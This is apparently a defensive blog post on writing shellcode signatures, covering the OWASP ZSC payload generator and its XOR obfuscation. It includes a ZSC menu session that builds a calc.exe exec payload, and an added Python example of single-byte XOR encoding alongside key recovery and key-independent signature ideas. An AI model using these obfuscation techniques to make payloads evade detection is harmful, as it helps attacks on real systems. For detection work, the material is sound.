In this installment of our Shellcode Signatures Series, we discuss the OWASP ZSC Framework. While this project is not as robust as a larger framework like Metasploit, it does supply payloads and obfuscators that are worth understanding from a defensive standpoint.
The OWASP ZSC Framework is capable of producing several different types of built-in payloads and has support for downloading shellcode samples from shell_storm. The tool also contains basic obfuscators that can modify payloads to aid in bypassing detection.
In our earlier blog posts, we discussed different methods of obtaining the instruction pointer (GetPC). When writing signatures for shellcode, the primary goal is a small number of signatures that trigger on intrinsic properties of the shellcode, so that no signature has to enumerate every discovered variant.
There are several obfuscators and payloads supported within ZSC. For the sake of brevity, we will only break down a couple of the methods the tool uses in this blog post.
Generating Shellcode and XOR Obfuscation
Generating shellcode within ZSC is a simple process: navigating the menus allows the user to select the architecture, operating system, payload, and finally the obfuscation technique to apply.
A simple session would resemble the following:
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> C:\Windows\System32\Calc.exe
[+] file_to_execute set to "C:\Windows\System32\Calc.exe"
[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue
[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
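To show why a single-byte XOR obfuscator such as xor_random defeats a byte-for-byte body signature but not a signature on an invariant property, here is an added example (not code from ZSC or from the original post). The payload body is a constructed byte string, not real shellcode; the marker string and the delta signature are assumptions about what a defender might key on.

```python
import os
from typing import Optional, Tuple

# Constructed sample bytes standing in for a decoded payload body (not real shellcode).
# The embedded API name is the kind of property a body signature might match on.
SAMPLE_BODY = b"\x31\xc9GetProcAddress\x00WinExec\x00calc.exe\x00"
MARKER = b"GetProcAddress"


def xor_encode(body: bytes, key: int) -> bytes:
    """XOR every byte with one key; the same call also decodes."""
    return bytes(b ^ key for b in body)


def xor_random(body: bytes) -> Tuple[int, bytes]:
    """Pick a random non-zero key, as xor_random-style obfuscators do, so the
    encoded bytes differ on every generation (key 0 would leave the body intact)."""
    key = (os.urandom(1)[0] % 255) + 1
    return key, xor_encode(body, key)


def body_signature_hits(data: bytes) -> bool:
    """A naive signature that looks for the plaintext marker in the bytes."""
    return MARKER in data


def recover_key(encoded: bytes, marker: bytes) -> Optional[int]:
    """Defender side: the key space is only 256 values, so try each one and
    return the key under which the known plaintext marker appears."""
    for key in range(256):
        if marker in xor_encode(encoded, key):
            return key
    return None


def delta_signature(data: bytes) -> bytes:
    """XOR of each adjacent byte pair. Because (p[i]^k) ^ (p[i+1]^k) == p[i]^p[i+1],
    this sequence is identical for the plaintext and for any single-byte-XOR
    encoding of it, so a signature written on it is key-independent."""
    return bytes(a ^ b for a, b in zip(data, data[1:]))


if __name__ == "__main__":
    key, encoded = xor_random(SAMPLE_BODY)
    print("key:", hex(key))
    print("plain body signature hits encoded bytes:", body_signature_hits(encoded))
    print("brute-forced key:", hex(recover_key(encoded, MARKER)))
    print("delta signature stable:", delta_signature(encoded) == delta_signature(SAMPLE_BODY))
```

The same brute-force idea is what YARA's xor string modifier does for you; the delta signature is only stable for single-key XOR, not for rolling keys or add/sub encoders.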